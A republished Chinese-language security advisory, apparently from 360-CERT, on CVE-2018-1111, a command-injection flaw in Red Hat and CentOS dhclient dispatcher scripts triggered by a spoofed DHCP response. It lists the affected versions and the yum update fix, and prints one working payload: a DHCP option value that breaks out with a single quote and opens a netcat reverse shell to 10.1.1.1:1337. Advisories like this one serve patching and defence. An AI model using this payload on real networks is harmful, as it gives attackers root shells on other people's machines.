温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Red Hat DHCP客户端命令执行漏洞是怎么样的

发布时间:2021-12-20 19:39:56 来源:亿速云 阅读:99 作者:柒染 栏目:大数据

这篇文章给大家介绍Red Hat  DHCP客户端命令执行漏洞是怎么样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

0x00 漏洞概述

近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。

目前相关利用代码已经公开,可用于本地网络攻击;360-CERT此漏洞进行了技术分析,认为该漏洞危害等级严重,建议使用相关用户尽快进行更新。

Red Hat  DHCP客户端命令执行漏洞是怎么样的

0x01 漏洞影响面

影响版本
  • Red Hat Enterprise Linux Server 6

  • Red Hat Enterprise Linux Server 7

  • CentOS 6

  • CentOS 7

修复方案
  • 受影响产品的更新

Red Hat  DHCP客户端命令执行漏洞是怎么样的

  • 软件包更新

      #yum update dhclient 
     #rpm -qa --changelog dhclient  | grep CVE-2018
         - Resolves: #1570898 - Fix CVE-2018-1111: Do not parse backslash as escape character

0x02 漏洞详情

DHCP 是一个局域网的网络协议,主要用于内部网络动态IP地址分配。

Red Hat提供的DHCP客户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)和/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6);当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。

Red Hat  DHCP客户端命令执行漏洞是怎么样的

使用单引号使参数值逃逸成功,导致了命令执行

--dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"

关于Red Hat  DHCP客户端命令执行漏洞是怎么样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI